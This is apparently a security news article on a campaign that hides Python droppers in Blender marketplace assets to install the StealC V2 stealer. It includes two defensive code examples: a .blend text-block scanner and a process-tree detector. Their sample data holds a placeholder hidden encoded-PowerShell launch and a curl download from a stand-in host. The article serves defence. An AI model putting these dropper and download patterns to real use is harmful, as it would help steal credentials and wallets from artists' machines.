
When 3D Creativity Becomes a Trap: Threat Actors Turn Blender Assets into a Stealing Pipeline

  • Javier Conejo del Cerro
  • 4 minutes ago
  • 3 min read

A new campaign shows how a single overlooked feature inside a creative tool can become the perfect opening for cybercriminals. For at least six months, threat actors have been quietly poisoning the 3D design ecosystem by uploading malicious Blender .blend assets to public marketplaces such as CGTrader. When an unsuspecting artist, animator, or developer opens one of these files with Blender's Auto Run enabled, the embedded Python script executes on its own and downloads StealC V2 together with a secondary stealer, turning a harmless-looking 3D model into the entry point for large-scale credential theft, crypto-wallet compromise, and full system profiling. The operation mirrors past campaigns tied to Russian-speaking actors and highlights once again how creative communities have become high-value targets in modern cybercrime.


Phase 1: Seeding the Trap — Malicious Blender Files as Initial Access


The attackers' first phase is supply-chain poisoning of online 3D marketplaces. They upload .blend files that look like legitimate assets (character rigs, props, animation-ready models), capitalizing on Blender's popularity and the trust users place in well-established platforms like CGTrader. Inside each file the adversaries embed a Python script as a text datablock named Rig_Ui.py. Blender can run Python stored inside a .blend in two places, text datablocks flagged to register on load and driver expressions, and it does so only when the Auto Run Python Scripts preference is enabled; a rig UI script is exactly the kind of text block artists are used to allowing, so the name raises no suspicion.

This dependency on Auto Run is crucial. Blender's own documentation warns that with Auto Run enabled, Python in a .blend can do anything the user can, with no prompt. For advanced rigging that is a feature; in the wrong hands it is a turnkey code-execution primitive that needs no vulnerability. Because the first stage runs inside Blender's own Python interpreter, nothing malicious touches disk until the script decides to download it, so controls that key on suspicious documents or dropped binaries have nothing to inspect at that point, and creative tools are rarely covered by application-control or child-process rules. The payloads that follow are ordinary executables, which is where detection has to pick up.

This tactic echoes a previous campaign attributed to Russian-speaking actors who impersonated the Electronic Frontier Foundation (EFF) to distribute StealC and Pyramid C2. The similarities—in decoy usage, embedded scripting, and stealthy post-execution behavior—strongly suggest shared tactics, techniques, and possible operator overlap.


Phase 2: Silent Execution — Auto Run and Python Abuse Inside Blender


When the victim opens the .blend file with Auto Run enabled, Blender executes the embedded script immediately and silently; there is no prompt and no visible change in the scene. (With Auto Run disabled, which is Blender's default, the file still opens but the script does not run, and Blender shows a header warning offering to allow execution; users who routinely click Allow Execution on downloaded rigs are effectively enabling it file by file.) The malicious logic retrieves a PowerShell script that downloads two ZIP archives from remote servers controlled by the attackers.
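Phase 1 and Phase 2 both hinge on the embedded text block, so the practical question for a defender is how to look at that block without letting Blender run it. The following is an added example written for this article, not code from the original post, from Blender, or from the researchers who documented the campaign. It reads the .blend container format directly (the 12-byte header and the code/size/pointer/SDNA/count block headers used by Blender 2.x through 4.x), pulls every Text datablock out, and flags tokens a rig UI has no reason to contain. The token list, the two sample scripts, and the build_sample_blend helper are all assumptions for illustration; the helper fabricates a minimal file in Blender's TX/DATA layout so the scanner can be exercised offline, where a real marketplace asset would otherwise be the input.

```python
"""Offline triage of the Python text blocks embedded in a .blend file.

Added example for this article (not Blender's code, nor the researchers').
Parses the .blend container directly so nothing in the file is ever executed.
Assumptions: classic 12-byte header (Blender 2.x-4.x), Blender's habit of
writing each Text line as a NUL-terminated DATA block right after the Text ID
block, and a token list that is a starting point rather than a signature set.
"""
import gzip
import re
import struct

# Tokens a rig UI script has no reason to contain (assumption: tune per environment).
SUSPICIOUS = (b"subprocess", b"os.system", b"os.popen", b"powershell", b"Invoke-",
              b"urllib", b"requests.", b"socket", b"ctypes", b"base64", b"exec(", b"eval(")

def _decompress(data: bytes) -> bytes:
    if data[:2] == b"\x1f\x8b":           # gzip: the "Compress" save option up to Blender 2.9x
        return gzip.decompress(data)
    if data[:4] == b"\x28\xb5\x2f\xfd":   # zstd: the "Compress" save option from Blender 3.0
        raise ValueError("zstd-compressed .blend: run `zstd -d` on it first")
    return data

def iter_blocks(data: bytes):
    """Yield (block code, payload) for every file block; no DNA resolution needed."""
    data = _decompress(data)
    if data[:7] != b"BLENDER" or data[7:8] not in (b"-", b"_"):
        raise ValueError("unrecognised .blend header (Blender 2.x-4.x layout expected)")
    ptr = "Q" if data[7:8] == b"-" else "I"       # '-' 64-bit pointers, '_' 32-bit
    endian = "<" if data[8:9] == b"v" else ">"    # 'v' little-endian, 'V' big-endian
    hdr = f"{endian}4sI{ptr}II"                   # code, size, old address, SDNA index, count
    hlen, off = struct.calcsize(hdr), 12
    while off + hlen <= len(data):
        code, size, _addr, _sdna, _count = struct.unpack_from(hdr, data, off)
        off += hlen
        yield code, data[off:off + size]
        off += size
        if code == b"ENDB":
            return

def _as_text_line(payload: bytes):
    """Raw Text lines are NUL-terminated printable strings; TextLine structs are not."""
    line = payload.split(b"\x00", 1)[0]
    if not line:                                  # blank line, or a struct starting with NULs
        return None
    try:
        text = line.decode("utf-8")
    except UnicodeDecodeError:
        return None
    return text if all(c.isprintable() or c == "\t" for c in text) else None

def extract_text_blocks(data: bytes):
    """Return [(datablock name, reconstructed source)] for every embedded Text datablock."""
    scripts, current = [], None
    for code, payload in iter_blocks(data):
        if code == b"TX\x00\x00":                 # Text ID block; ID.name is stored as "TX<name>"
            match = re.search(rb"TX([\x20-\x7e]{1,64})\x00", payload)
            current = (match.group(1).decode() if match else "<unnamed>", [])
            scripts.append(current)
        elif code == b"DATA" and current is not None:
            text = _as_text_line(payload)
            if text is not None:
                current[1].append(text)
        else:
            current = None                        # any other block ends this Text's DATA run
    return [(name, "\n".join(lines)) for name, lines in scripts]

def scan_blend(data: bytes):
    """One finding per Text datablock: name, non-blank line count, suspicious tokens seen."""
    findings = []
    for name, source in extract_text_blocks(data):
        raw = source.encode()
        hits = sorted(t.decode() for t in SUSPICIOUS if t in raw)
        findings.append({"name": name, "lines": raw.count(b"\n") + 1 if raw else 0, "hits": hits})
    return findings

def is_suspicious(data: bytes) -> bool:
    return any(f["hits"] for f in scan_blend(data))

def build_sample_blend(texts: dict, compress: bool = False) -> bytes:
    """Constructed, minimal 64-bit little-endian .blend so the scanner can run offline.
    Mimics the TX/DATA layout Blender writes but omits DNA1, so Blender would reject it."""
    def block(code: bytes, payload: bytes, count: int = 1) -> bytes:
        payload += b"\x00" * ((-len(payload)) % 4)                 # block data is 4-byte aligned
        return struct.pack("<4sIQII", code, len(payload), 0xDEADBEEF, 0, count) + payload
    out = b"BLENDER-v404"
    for name, src in texts.items():
        out += block(b"TX\x00\x00", (b"\x00" * 40 + b"TX" + name.encode() + b"\x00").ljust(240, b"\x00"))
        for line in src.splitlines():                              # fake TextLine struct, then text
            out += block(b"DATA", struct.pack("<QQQQI4x", 0x1234, 0x5678, 0x9ABC, 0, len(line)))
            out += block(b"DATA", line.encode() + b"\x00")
    out += block(b"ENDB", b"", 0)
    return gzip.compress(out) if compress else out

# Constructed samples: a plausible rig panel, and a text block that hands off to PowerShell
# the way the campaign write-up describes (placeholder strings, not a real payload).
BENIGN_RIG_UI = "import bpy\n\nclass RIG_PT_panel(bpy.types.Panel):\n    bl_label = 'Rig UI'\n"
DROPPER_LIKE = ("import subprocess, base64\n"
                "cmd = base64.b64decode('<encoded command>')\n"
                "subprocess.Popen(['powershell', '-w', 'hidden', '-enc', cmd])\n")
```

Run it against a downloaded asset with scan_blend(open(path, "rb").read()). Files saved with Blender 3.0+ and the Compress option are zstd-compressed and need decompressing first, and an unrecognised header is rejected rather than misparsed. The printable-line heuristic is deliberately loose: it reconstructs the script for a human to read and drops blank lines, which is fine for triage but not a substitute for opening the file with Auto Run off and reading the text blocks and driver expressions in Blender.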

The first archive contains StealC V2, the latest upgrade of the StealC stealer family announced in April 2025. The second archive contains an additional Python-based stealer, ensuring redundancy and broader data coverage. This multi-payload strategy enables the operators to run parallel data-exfiltration pipelines.

StealC V2 is engineered to target a wide spectrum of sensitive data sources:

  • 23 browsers (including Chromium-based and Firefox-based families)

  • 100 browser plugins and extensions

  • 15 cryptocurrency wallet applications

  • Messaging clients

  • VPN services

  • Email clients

Together, the two stealers provide deep visibility into stored credentials, browser sessions, wallet secrets, communication histories, plugin tokens, and system metadata.


Phase 3: Data Theft — Exfiltration at Scale


Once inside the system, StealC V2 begins harvesting information with minimal footprint. Its improved version introduces:

  • Expanded browser-session extraction

  • Token and plugin harvesting

  • Crypto-wallet key retrieval

  • System fingerprinting

  • Silent persistence mechanisms

The Python-based secondary stealer offers additional coverage, ensuring that if one payload fails or is detected, the other continues collecting high-value artifacts.

Blender's typical host profile works in the attackers' favour: dedicated GPUs, plenty of RAM, large project files and cloud-storage sync on a personal or studio workstation. Such machines look nothing like the resource-starved virtual machines used for automated sandbox analysis, so a stealer that fingerprints the hardware before doing anything noisy can be confident it is on a real victim. Creative-industry endpoints are often hardware-rich but under-protected, making them ideal targets for stealers seeking financial assets or corporate credentials.


Measures to Fend Off the Attack


  • Leave Blender's Auto Run Python Scripts preference disabled (it is off by default) unless a .blend file comes from a fully trusted and verified source. When a rig genuinely needs it, allow execution for that one file after reading its text blocks rather than enabling the preference globally, and launch Blender with -Y (--disable-autoexec) on machines that only consume third-party assets.

  • Enforce provenance checks for any Blender file sourced from a public marketplace like CGTrader: open it with Auto Run off and review every entry in the Text Editor and any driver expressions, or scan the file offline before it reaches an artist's workstation.

  • Block PowerShell launched as a child of applications that have no business spawning a shell, Blender included, using EDR custom rules or equivalent controls; where the business does not need it, restrict PowerShell for standard users with application control.

  • Monitor for ZIP-based loaders, Python scripts launched from Blender processes, and suspicious PowerShell spawns.

  • Deploy EDR/XDR with behavioral detection capable of identifying StealC V2 patterns, Python-based stealers, and browser/wallet data-extraction activity.

  • Restrict or audit network traffic from Blender processes. Blender's legitimate outbound traffic is minimal (extension and update checks, and only if online access is permitted in its preferences), so a PowerShell-driven download or any connection from a child process of blender.exe is worth an alert.

  • Educate creative teams on file-integrity risks and the dangers of Auto Run in toolchains that support embedded scripting.
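The monitoring bullets above describe a process-tree signal: blender.exe, or a short chain of processes below it, spawning a shell or download utility. The following is an added example written for this article, not a rule from any EDR vendor or from the researchers, showing how that logic can be expressed over Sysmon-style process-creation records. The event records are constructed for the example, and the image lists, command-line markers and severity scheme are assumptions to be tuned to your environment.

```python
"""Process-tree detection for shell and download activity descending from Blender.

Added example for this article (not a vendor rule). Runs over constructed
Sysmon-style process-creation records; image lists, markers and the severity
scheme are assumptions to tune locally.
"""
from dataclasses import dataclass

CREATIVE_HOSTS = {"blender.exe"}          # assumption: extend with other tools that embed scripts
LOLBIN_CHILDREN = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                   "mshta.exe", "rundll32.exe", "regsvr32.exe", "curl.exe", "certutil.exe",
                   "bitsadmin.exe"}
DOWNLOAD_MARKERS = ("http://", "https://", "invoke-webrequest", "iwr ", "downloadfile",
                    "downloadstring", "invoke-expression", "iex ", "-enc", "-encodedcommand",
                    "frombase64string", "expand-archive", "start-bitstransfer",
                    "-w hidden", "-windowstyle hidden")
MAX_ANCESTOR_HOPS = 4                     # cmd -> powershell -> curl style chains are short

@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str
    command_line: str

def _basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()

def _creative_ancestor(ev: ProcEvent, by_pid: dict, hops: int = MAX_ANCESTOR_HOPS):
    """Nearest creative-app ancestor within `hops` parents, or None. Keyed on PID here;
    a production rule should key on ProcessGuid so PID reuse cannot splice trees."""
    cur = ev
    for _ in range(hops):
        cur = by_pid.get(cur.ppid)
        if cur is None:
            return None
        if _basename(cur.image) in CREATIVE_HOSTS:
            return _basename(cur.image)
    return None

def evaluate(events):
    """Return one alert per process that descends from a creative app and looks like a loader."""
    by_pid = {e.pid: e for e in events}
    alerts = []
    for ev in events:
        ancestor = _creative_ancestor(ev, by_pid)
        if ancestor is None:
            continue
        child, cmdline = _basename(ev.image), ev.command_line.lower()
        reasons = []
        if child in LOLBIN_CHILDREN:
            reasons.append(f"{ancestor} -> {child}")
        markers = [m for m in DOWNLOAD_MARKERS if m in cmdline]
        if markers:
            reasons.append("command line: " + ", ".join(markers))
        if reasons:
            alerts.append({"pid": ev.pid, "image": child,
                           "severity": "high" if len(reasons) > 1 else "medium",
                           "reasons": reasons})
    return alerts

# Constructed sample records (not real telemetry): an artist opens a downloaded asset, the
# embedded script launches PowerShell and a cmd/curl chain, and explorer runs an unrelated
# PowerShell that must not be flagged.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, r"C:\Program Files\Blender Foundation\Blender 4.2\blender.exe",
              r'"blender.exe" C:\Users\artist\Downloads\asset.blend'),
    ProcEvent(300, 200, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -w hidden -nop -enc <base64 blob>"),
    ProcEvent(400, 200, r"C:\Windows\System32\cmd.exe",
              r'cmd.exe /c "curl.exe -s -o %TEMP%\asset.zip http://example.invalid/asset.zip"'),
    ProcEvent(500, 400, r"C:\Windows\System32\curl.exe",
              r"curl.exe -s -o C:\Users\artist\AppData\Local\Temp\asset.zip http://example.invalid/asset.zip"),
    ProcEvent(600, 100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe Get-Process"),
    ProcEvent(700, 200, r"C:\Windows\System32\cmd.exe", "cmd.exe /c echo rigging"),
]
```

The ancestry walk matters because the script does not need to spawn PowerShell directly; a cmd.exe /c or a second interpreter in between would defeat a flat parent/child rule. PID reuse on a busy host can splice unrelated trees, so a production rule should key on Sysmon's ProcessGuid rather than the PID used here, and should be paired with a network-connection rule for the same process set.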


This campaign highlights a growing trend: creative software ecosystems are becoming part of the cyberattack surface. By abusing Blender’s Auto Run scripting capability and the trust placed in user-generated marketplaces, attackers transformed routine asset downloads into direct infection channels. The combination of StealC V2, a Python-based stealer, and stealthy Auto Run execution demonstrates how threat actors now exploit legitimate workflows to bypass traditional controls. As creative industries and technical teams become increasingly interconnected, organizations must reevaluate how seemingly safe tools fit into their threat models. What appears to be a harmless 3D asset may in reality be a delivery system for credential theft and long-term compromise.



The Hacker News